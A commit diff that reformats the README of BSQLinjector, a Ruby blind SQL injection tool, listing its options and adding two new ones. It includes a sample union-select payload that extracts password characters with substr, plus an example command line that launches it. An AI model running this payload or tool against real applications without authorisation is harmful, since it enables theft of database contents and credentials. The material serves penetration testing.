Update README.md

README.md

@@ -1,31 +1,36 @@
-BSQLinjector by Jakub Pałaczyński
+## BSQLinjector by Jakub Pałaczyński
 
 BSQLinjector uses blind method to retrieve data from SQL databases.
 I recommend using "--test" switch to clearly see how configured payload looks like before sending it to an application.
 
-Options:
-  --file	Mandatory - File containing valid HTTP request and SQL injection point (SQLINJECT). (--file=/tmp/req.txt)
-  --pattern	Mandatory - Pattern to look for when query is true. (--pattern=truestatement)
-  --prepend	Mandatory - Main payload. (--prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,"
-  --append	How to end our payload. For example comment out rest of SQL statement. (--append='#)
-  --2ndfile	File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)
+## Options:
+```
+  --file	    Mandatory - File containing valid HTTP request and SQL injection point (SQLINJECT). (--file=/tmp/req.txt)
+  --pattern	    Mandatory - Pattern to look for when query is true. (--pattern=truestatement)
+  --prepend	    Mandatory - Main payload. (--prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,"
+  --append	    How to end our payload. For example comment out rest of SQL statement. (--append='#)
+  --schar	    Character placed around chars. This character is not used while in hex mode. (--schar="'")
+  --2ndfile	    File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)
 
-  --mode	Blind mode to use - (between - b (generates less requests), moreless - a (generates less requests by using "<", ">", "=" characters), like - l (complete bruteforce), equals - e (complete bruteforce)). (--mode=l)
-  --hex		Use hex to compare instead of characters.
-  --case	Case sensitivity.
+  --mode	    Blind mode to use - (between - b (generates less requests), moreless - a (generates less requests by using "<", ">", "=" characters), like - l (complete bruteforce), equals - e (complete bruteforce)). (--mode=l)
+  --hex		    Use hex to compare instead of characters.
+  --case	    Case sensitivity.
 
-  --ssl		Use SSL.
-  --proxy	Proxy to use. (--proxy=127.0.0.1:8080)
+  --ssl		    Use SSL.
+  --proxy	    Proxy to use. (--proxy=127.0.0.1:8080)
 
-  --test	Enable test mode. Do not send request, just show full payload.
-  --comma	Encode comma.
-  --bracket	Add brackets to the end of substring function. --bracket="))"
-  --schar	Character placed around chars. This character is not used while in hex mode. (--schar="'")
-  --special	Include all special characters in enumeration.
-  --start	Start enumeration from specified character. (--start=10)
-  --max		Maximum characters to enumerate. (--max=10)
-  --timeout	Timeout in waiting for responses. (--timeout=20)
-  --verbose	Show verbose messages.
+  --test	    Enable test mode. Do not send request, just show full payload.
+  --comma	    Encode comma.
+  --bracket	    Add brackets to the end of substring function. --bracket="))"
+  --hexspace	Use space instead of brackets to split hex values.
+  --special	    Include all special characters in enumeration.
+  --start	    Start enumeration from specified character. (--start=10)
+  --max		    Maximum characters to enumerate. (--max=10)
+  --timeout	    Timeout in waiting for responses. (--timeout=20)
+  --verbose	    Show verbose messages.
+  ```
 
-Example usage:
-  ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl
+## Example usage:
+```
+  ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --schar="'" --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl
+```